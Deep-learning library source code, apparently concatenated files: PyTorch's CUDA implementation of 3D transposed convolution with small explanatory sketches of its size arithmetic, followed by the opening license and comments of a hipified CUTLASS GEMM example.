at::borrow_from_optional_tensor(bias_opt); const Tensor& bias = *bias_maybe_owned; Tensor output = at::empty_like(input, LEGACY_CONTIGUOUS_MEMORY_FORMAT); slow_conv_transpose3d_out_cuda_template( output, input, weight, kernel_size, bias, stride, padding, output_padding, dilation); return output; } std::tuple<Tensor&, Tensor&, Tensor&> slow_conv_transpose3d_backward_out_cuda(const Tensor& grad_output, const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, 
Tensor& grad_input, Tensor& grad_weight, Tensor& grad_bias) { if (grad_input.defined()) { slow_conv_transpose3d_backward_out_cuda_template( input, grad_output, grad_input, weight, kernel_size, stride, padding, output_padding, dilation); } if (grad_weight.defined()) { grad_weight.resize_(weight.sizes()); grad_weight.zero_(); } if (grad_bias.defined()) { grad_bias.resize_({weight.size(1)}); grad_bias.zero_(); } if (grad_weight.defined() || grad_bias.defined()) { slow_conv_transpose3d_acc_grad_parameters_cuda( input, grad_output, grad_weight, grad_bias, kernel_size, stride, padding, output_padding, dilation, 1); } return std::tuple<Tensor&, Tensor&, Tensor&>( grad_input, grad_weight, grad_bias); } std::tuple<Tensor, Tensor, Tensor> slow_conv_transpose3d_backward_cuda( const Tensor& grad_output, const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, std::array<bool, 3> output_mask) { Tensor grad_input; Tensor grad_weight; Tensor grad_bias; if (output_mask[0]) { grad_input = at::empty({0}, grad_output.options()); } else { grad_input = Tensor(); } if (output_mask[1]) { grad_weight = at::empty({0}, grad_output.options()); } else { grad_weight = Tensor(); } if (output_mask[2]) { grad_bias = at::empty({0}, grad_output.options()); } else { grad_bias = Tensor(); } if (grad_input.defined()) { slow_conv_transpose3d_backward_out_cuda_template( input, grad_output, grad_input, weight, kernel_size, stride, padding, output_padding, dilation); } if (grad_weight.defined()) { grad_weight.resize_(weight.sizes()); grad_weight.zero_(); } if (grad_bias.defined()) { grad_bias.resize_({weight.size(1)}); grad_bias.zero_(); } if (grad_weight.defined() || grad_bias.defined()) { slow_conv_transpose3d_acc_grad_parameters_cuda( input, grad_output, grad_weight, grad_bias, kernel_size, stride, padding, output_padding, dilation, 1); } return std::tuple<Tensor, Tensor, Tensor>(grad_input, grad_weight, grad_bias); } REGISTER_CUDA_DISPATCH(slow_conv_transpose3d_backward_stub, &slow_conv_transpose3d_backward_cuda); } // namespace at::native
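Every output extent in the file above comes from the same transposed-convolution formula, output = (input - 1) * stride - 2 * padding + (dilation * (kernel - 1) + 1) + output_padding. The host-only sketch below just replays that arithmetic with illustrative numbers that are not taken from any test.

#include <cstdint>
#include <cstdio>

// Transposed-convolution output extent, mirroring the per-dimension formula
// used in slow_conv_transpose3d_shape_check.
static int64_t conv_transpose_out(int64_t input, int64_t stride, int64_t padding,
                                  int64_t dilation, int64_t kernel, int64_t output_padding) {
    return (input - 1) * stride - 2 * padding + (dilation * (kernel - 1) + 1) + output_padding;
}

int main() {
    // Assumed sizes: input depth 8, stride 2, padding 1, dilation 1, kernel 3, output_padding 1.
    printf("output_depth = %lld\n",
           (long long)conv_transpose_out(8, 2, 1, 1, 3, 1));   // (8-1)*2 - 2 + 3 + 1 = 16
    return 0;
}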
ba8920157a70a1e6dfdae4fa3316bf8e001761cd.cu
#define TORCH_ASSERT_ONLY_METHOD_OPERATORS #include <ATen/core/Tensor.h> #include <ATen/AccumulateType.h> #include <ATen/Dispatch.h> #include <ATen/TensorUtils.h> #include <ATen/Utils.h> #include <ATen/cuda/CUDABlas.h> #include <ATen/cuda/CUDAContext.h> #include <ATen/native/ConvUtils.h> #include <ATen/native/cuda/vol2col.cuh> #ifndef AT_PER_OPERATOR_HEADERS #include <ATen/Functions.h> #include <ATen/NativeFunctions.h> #else #include <ATen/ops/empty.h> #include <ATen/ops/empty_like.h> #include <ATen/ops/sum.h> #include <ATen/ops/ones.h> #include <ATen/ops/slow_conv_transpose3d_native.h> #endif namespace at::native { namespace { static inline void slow_conv_transpose3d_shape_check( const Tensor& input, const Tensor& grad_output, const Tensor& weight, const Tensor& bias, int kernel_depth, int kernel_width, int kernel_height, int stride_depth, int stride_width, int stride_height, int padding_depth, int padding_width, int padding_height, int dilation_depth, int dilation_width, int dilation_height, int output_padding_depth, int output_padding_width, int output_padding_height, int weight_nullable) { TORCH_CHECK( input.numel() != 0 && (input.dim() == 4 || input.dim() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input, but got: ", input.sizes()); TORCH_CHECK( stride_depth > 0 && stride_width > 0 && stride_height > 0, "stride should be greater than zero, but got stride_depth: ", stride_depth, " stride_height: ", stride_height, " stride_width: ", stride_width); TORCH_CHECK( dilation_depth > 0 && dilation_width > 0 && dilation_height > 0, "dilation should be greater than zero, but got dilation_depth: ", dilation_depth, ", dilation_height: ", dilation_height, ", dilation_width: ", dilation_width); TORCH_CHECK( (output_padding_depth < stride_depth || output_padding_depth < dilation_depth) && (output_padding_width < stride_width || output_padding_width < dilation_width) && (output_padding_height < stride_height || output_padding_height < dilation_height), "output padding must be smaller than either stride or dilation,", " but got output_padding_depth: ", output_padding_depth, " output_padding_height: ", output_padding_height, " output_padding_width: ", output_padding_width, " stride_depth: ", stride_depth, " stride_height: ", stride_height, " stride_width: ", stride_width, " dilation_depth: ", dilation_depth, " dilation_height: ", dilation_height, " dilation_width: ", dilation_width); // number of input & output planes and kernel size is indirectly defined by // the weight tensor if (weight.defined()) { TORCH_CHECK( weight.numel() != 0 && weight.dim() == 5, "non-empty 5D (n_output_plane x n_input_plane ", "x kernel_depth x kernel_height x kernel_width) tensor ", "expected for weight, but got: ", weight.sizes()); if (bias.defined()) { check_dim_size(bias, 1, 0, weight.size(1)); } } else if (!weight_nullable) { AT_ERROR("weight tensor is expected to be non-nullable"); } int ndim = input.dim(); int dimf = 0; int dimd = 1; int dimh = 2; int dimw = 3; if (ndim == 5) { dimf++; dimd++; dimh++; dimw++; } if (weight.defined()) { const int64_t n_input_plane = weight.size(0); check_dim_size(input, ndim, dimf, n_input_plane); } int64_t input_width = input.size(dimw); int64_t input_height = input.size(dimh); int64_t input_depth = input.size(dimd); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * 
(kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; if (output_depth < 1 || output_width < 1 || output_height < 1) { AT_ERROR( "Given input size per channel: (", input_depth, " x ", input_height, " x ", input_width, "). Calculated output size per channel: (", output_depth, " x ", output_height, " x ", output_width, "). Output size is too small"); } if (grad_output.defined()) { if (weight.defined()) { const int64_t n_output_plane = weight.size(1); check_dim_size(grad_output, ndim, dimf, n_output_plane); } else if (bias.defined()) { const int64_t n_output_plane = bias.size(0); check_dim_size(grad_output, ndim, dimf, n_output_plane); } check_dim_size(grad_output, ndim, dimd, output_depth); check_dim_size(grad_output, ndim, dimh, output_height); check_dim_size(grad_output, ndim, dimw, output_width); } } void slow_conv_transpose3d_out_cuda_template( Tensor& output, const Tensor& input_, const Tensor& weight_, IntArrayRef kernel_size, const Tensor& bias_, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; int n_input_plane = weight_.size(0); int n_output_plane = weight_.size(1); TensorArg input_arg{input_, "input", 1}, output_arg{output, "output", 2}, weight_arg{weight_, "weight", 3}, bias_arg{bias_, "bias", 4}; checkAllSameGPU( "slow_conv_transpose3d_out_cuda", {input_arg, output_arg, weight_arg, bias_arg}); slow_conv_transpose3d_shape_check( input_, Tensor(), weight_, bias_, kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 0); Tensor input = input_.contiguous(); Tensor weight = weight_.contiguous(); Tensor bias = bias_.defined() ? 
bias_.contiguous() : bias_; int is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Resize output output.resize_( {batch_size, n_output_plane, output_depth, output_height, output_width}); // Create temporary columns Tensor columns = at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()); // Define a buffer of ones, for bias accumulation Tensor ones = bias.defined() ? at::ones({output_depth, output_height, output_width}, input_.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_out_cuda", [&] { using accscalar_t = at::acc_type<scalar_t, true>; // Helpers Tensor input_n; Tensor output_n; // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per output: input_n = input.select(0, elt); output_n = output.select(0, elt); // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = weight.size(1) * weight.size(2) * weight.size(3) * weight.size(4); int64_t n = columns.size(1); int64_t k = weight.size(0); // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) at::cuda::blas::gemm<scalar_t>( 'n', 't', n, m, k, static_cast<scalar_t>(1), input_n.const_data_ptr<scalar_t>(), n, weight.const_data_ptr<scalar_t>(), m, static_cast<scalar_t>(0), columns.mutable_data_ptr<scalar_t>(), n); // Unpack columns back into input: at::native::col2vol<scalar_t, accscalar_t>( at::cuda::getCurrentCUDAStream(), columns.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, output_n.mutable_data_ptr<scalar_t>()); // Do Bias after: // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m_ = n_output_plane; int64_t n_ = output_depth * output_height * output_width; int64_t k_ = 1; // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) if (bias.defined()) { at::cuda::blas::gemm<scalar_t>( 't', 'n', n_, m_, k_, static_cast<scalar_t>(1), ones.const_data_ptr<scalar_t>(), k_, bias.const_data_ptr<scalar_t>(), k_, static_cast<scalar_t>(1), output_n.mutable_data_ptr<scalar_t>(), n_); } } // Resize output if (is_batch) { output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {n_input_plane, input_depth, input_height, input_width}); } }); } void slow_conv_transpose3d_backward_out_cuda_template( const Tensor& input_, const Tensor& grad_output_, Tensor& grad_input, const Tensor& weight_, 
IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int n_input_plane = weight_.size(0); int n_output_plane = weight_.size(1); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; TensorArg input_arg{input_, "input", 1}, grad_output_arg{grad_output_, "grad_output", 2}, weight_arg{weight_, "weight", 3}, grad_input_arg{grad_input, "grad_input", 4}; checkAllSameGPU( "slow_conv_transpose3d_backward_out_cuda", {input_arg, grad_output_arg, weight_arg, grad_input_arg}); slow_conv_transpose3d_shape_check( input_, grad_output_, weight_, Tensor(), kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 0); Tensor input = input_.contiguous(); Tensor grad_output = grad_output_.contiguous(); Tensor weight = weight_.contiguous(); bool is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); grad_output.resize_({1, grad_output.size(0), grad_output.size(1), grad_output.size(2), grad_output.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Resize output grad_input.resize_( {batch_size, n_input_plane, input_depth, input_height, input_width}); // Create temporary columns bool need_columns = (kernel_depth != 1 || kernel_height != 1 || kernel_width != 1 || stride_depth != 1 || stride_height != 1 || stride_width != 1 || dilation_depth != 1 || dilation_height != 1 || dilation_width != 1 || padding_depth != 0 || padding_height != 0 || padding_width != 0); Tensor grad_columns = need_columns ? 
at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_backward_out_cuda", [&] { // Helpers Tensor grad_input_n; Tensor grad_output_n; // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per sample: grad_input_n = grad_input.select(0, elt); grad_output_n = grad_output.select(0, elt); if (need_columns) { // Extract columns: at::native::vol2col<scalar_t>( at::cuda::getCurrentCUDAStream(), grad_output_n.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, grad_columns.mutable_data_ptr<scalar_t>()); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = weight.size(0); int64_t n = input_depth * input_height * input_width; int64_t k = weight.size(1) * weight.size(2) * weight.size(3) * weight.size(4); // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) auto gemm_in_ptr = need_columns ? grad_columns.const_data_ptr<scalar_t>() : grad_output_n.const_data_ptr<scalar_t>(); at::cuda::blas::gemm<scalar_t>( 'n', 'n', n, m, k, static_cast<scalar_t>(1), gemm_in_ptr, n, weight.const_data_ptr<scalar_t>(), k, static_cast<scalar_t>(0), grad_input_n.mutable_data_ptr<scalar_t>(), n); } // Resize output if (is_batch) { grad_output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {n_input_plane, input_depth, input_height, input_width}); grad_input.resize_( {n_input_plane, input_depth, input_height, input_width}); } }); } void slow_conv_transpose3d_acc_grad_parameters_cuda( const Tensor& input_, const Tensor& grad_output_, Tensor& grad_weight, Tensor& grad_bias, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, int scale_) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; TensorArg input_arg{input_, "input", 1}, grad_output_arg{grad_output_, "grad_output", 2}, grad_weight_arg{grad_weight, "grad_weight", 3}, grad_bias_arg{grad_bias, "grad_bias", 4}; checkAllSameGPU( 
"slow_conv_transpose3d_acc_grad_parameters_cuda", {input_arg, grad_output_arg, grad_weight_arg, grad_bias_arg}); slow_conv_transpose3d_shape_check( input_, grad_output_, grad_weight, grad_bias, kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 1); int n_output_plane; if (grad_weight.defined()) { n_output_plane = grad_weight.size(1); } else if (grad_bias.defined()) { n_output_plane = grad_bias.size(0); } else { return; } if (grad_weight.defined()) { TORCH_CHECK( grad_weight.is_contiguous(), "grad_weight needs to be contiguous"); } if (grad_bias.defined()) { TORCH_CHECK(grad_bias.is_contiguous(), "grad_bias needs to be contiguous"); } Tensor input = input_.contiguous(); Tensor grad_output = grad_output_.contiguous(); bool is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); grad_output.resize_({1, grad_output.size(0), grad_output.size(1), grad_output.size(2), grad_output.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Create temporary columns bool need_columns = (kernel_depth != 1 || kernel_height != 1 || kernel_width != 1 || stride_depth != 1 || stride_height != 1 || stride_width != 1 || dilation_depth != 1 || dilation_height != 1 || dilation_width != 1 || padding_depth != 0 || padding_height != 0 || padding_width != 0); Tensor columns = need_columns ? 
at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_acc_grad_parameters_cuda", [&] { // Helpers Tensor input_n; Tensor grad_output_n; scalar_t scale = static_cast<scalar_t>(scale_); // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per output: grad_output_n = grad_output.select(0, elt); // Do Weight: if (grad_weight.defined()) { // Matrix mulitply per output: input_n = input.select(0, elt); if (need_columns) { // Extract columns: at::native::vol2col<scalar_t>( at::cuda::getCurrentCUDAStream(), grad_output_n.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, columns.mutable_data_ptr<scalar_t>()); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t n = n_output_plane * kernel_width * kernel_height * kernel_depth; int64_t m = input_n.size(0); // n_input_plane int64_t k = input_depth * input_height * input_width; // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) auto gemm_in_ptr = need_columns ? columns.const_data_ptr<scalar_t>() : grad_output_n.const_data_ptr<scalar_t>(); at::cuda::blas::gemm<scalar_t>( 't', 'n', n, m, k, scale, gemm_in_ptr, k, input_n.const_data_ptr<scalar_t>(), k, static_cast<scalar_t>(1), grad_weight.mutable_data_ptr<scalar_t>(), n); } } if (grad_bias.defined()) { at::sum_out(grad_bias, grad_output, IntArrayRef{0, 2, 3, 4}); } // Resize if (is_batch) { grad_output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {input.size(1), input_depth, input_height, input_width}); } }); } } // namespace Tensor& slow_conv_transpose3d_out_cuda(const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, const c10::optional<Tensor>& bias_opt, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, Tensor& output) { // See [Note: hacky wrapper removal for optional tensor] c10::MaybeOwned<Tensor> bias_maybe_owned = at::borrow_from_optional_tensor(bias_opt); const Tensor& bias = *bias_maybe_owned; slow_conv_transpose3d_out_cuda_template( output, input, weight, kernel_size, bias, stride, padding, output_padding, dilation); return output; } Tensor slow_conv_transpose3d_cuda( const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, const c10::optional<Tensor>& bias_opt, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { // See [Note: hacky wrapper removal for optional tensor] c10::MaybeOwned<Tensor> bias_maybe_owned = at::borrow_from_optional_tensor(bias_opt); const Tensor& bias = *bias_maybe_owned; Tensor output = at::empty_like(input, LEGACY_CONTIGUOUS_MEMORY_FORMAT); slow_conv_transpose3d_out_cuda_template( output, input, weight, kernel_size, bias, stride, padding, output_padding, dilation); return output; } std::tuple<Tensor&, Tensor&, Tensor&> slow_conv_transpose3d_backward_out_cuda(const Tensor& grad_output, const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, Tensor& grad_input, 
Tensor& grad_weight, Tensor& grad_bias) { if (grad_input.defined()) { slow_conv_transpose3d_backward_out_cuda_template( input, grad_output, grad_input, weight, kernel_size, stride, padding, output_padding, dilation); } if (grad_weight.defined()) { grad_weight.resize_(weight.sizes()); grad_weight.zero_(); } if (grad_bias.defined()) { grad_bias.resize_({weight.size(1)}); grad_bias.zero_(); } if (grad_weight.defined() || grad_bias.defined()) { slow_conv_transpose3d_acc_grad_parameters_cuda( input, grad_output, grad_weight, grad_bias, kernel_size, stride, padding, output_padding, dilation, 1); } return std::tuple<Tensor&, Tensor&, Tensor&>( grad_input, grad_weight, grad_bias); } std::tuple<Tensor, Tensor, Tensor> slow_conv_transpose3d_backward_cuda( const Tensor& grad_output, const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, std::array<bool, 3> output_mask) { Tensor grad_input; Tensor grad_weight; Tensor grad_bias; if (output_mask[0]) { grad_input = at::empty({0}, grad_output.options()); } else { grad_input = Tensor(); } if (output_mask[1]) { grad_weight = at::empty({0}, grad_output.options()); } else { grad_weight = Tensor(); } if (output_mask[2]) { grad_bias = at::empty({0}, grad_output.options()); } else { grad_bias = Tensor(); } if (grad_input.defined()) { slow_conv_transpose3d_backward_out_cuda_template( input, grad_output, grad_input, weight, kernel_size, stride, padding, output_padding, dilation); } if (grad_weight.defined()) { grad_weight.resize_(weight.sizes()); grad_weight.zero_(); } if (grad_bias.defined()) { grad_bias.resize_({weight.size(1)}); grad_bias.zero_(); } if (grad_weight.defined() || grad_bias.defined()) { slow_conv_transpose3d_acc_grad_parameters_cuda( input, grad_output, grad_weight, grad_bias, kernel_size, stride, padding, output_padding, dilation, 1); } return std::tuple<Tensor, Tensor, Tensor>(grad_input, grad_weight, grad_bias); } REGISTER_CUDA_DISPATCH(slow_conv_transpose3d_backward_stub, &slow_conv_transpose3d_backward_cuda); } // namespace at::native
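For reference, the per-sample GEMM in the forward template uses m = n_output_plane * kD * kH * kW, n = input_depth * input_height * input_width and k = n_input_plane, i.e. exactly the {m, n} shape of the temporary columns buffer that col2vol then scatters into the output volume. The sketch below only replays that bookkeeping for assumed shapes; the sizes are illustrative, not values used by the kernel.

#include <cstdint>
#include <cstdio>

int main() {
    // Assumed shapes: weight is [n_input_plane, n_output_plane, kD, kH, kW],
    // one input sample is [n_input_plane, inD, inH, inW].
    const int64_t n_input_plane = 4, n_output_plane = 8;
    const int64_t kD = 3, kH = 3, kW = 3;
    const int64_t inD = 5, inH = 7, inW = 7;

    // GEMM dimensions as computed in slow_conv_transpose3d_out_cuda_template.
    const int64_t m = n_output_plane * kD * kH * kW;    // rows of the columns buffer
    const int64_t n = inD * inH * inW;                   // columns of the columns buffer
    const int64_t k = n_input_plane;                     // contraction dimension

    printf("m=%lld n=%lld k=%lld\n", (long long)m, (long long)n, (long long)k);   // m=216 n=245 k=4
    return 0;
}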
0699e8415e9039caef46daf879eba05cbb7209a8.hip
// !!! This is a file automatically generated by hipify!!! /*************************************************************************************************** * Copyright (c) 2017-2019, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are permitted * provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the NVIDIA CORPORATION nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TOR (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * **************************************************************************************************/ /** This example shows how to run matrix multiplication kernels using functions and data structures provided by CUTLASS using tensor cores; which we run on a NVIDIA Turing GPU. Writing a single high performance matrix multiplication kernel is hard but do-able. Whereas writing high performance kernels at scale which works for multiple problem sizes with good abstractions is really hard. CUTLASS solves this problem by providing simplified abstractions to compose multiple sections of gemm kernel. When used properly, the kernels can hit peak performance of GPU easily. CUTLASS divides a kernel into hierarchical composable sections. Which means, at each thread, warp and thread-block level, they compute on their own tile-size with higher level of tile sizes being composed from lower level ones. Multiple thread-tiles (tile size each thread computes) can be used to form warp-tiles (tile size each warp computes) and multiple warp tiles can be used to compute threadblock-tile (tile size computed by a threadblock). In thie example, we split variable initialization into 1. Setting up data properties : describes how matrices are laid out in the memory and how the kernel can view them (logical to physical mapping) 2. Setting up computation properties : describes how the above set matrices will be used to compute output of matrix multiplication. First, we setup the data types of matrices A, B, C and D along with alpha, beta as the equation for GEMM is D = alpha * A * B + beta * C. In CUTLASS, the kernels first compute A * B and leaves the rest of the computation to end of the kernel as alpha * X + beta * C is a simple element-wise operation on X (A * B) and C. We call this as epilogue of kernel. 
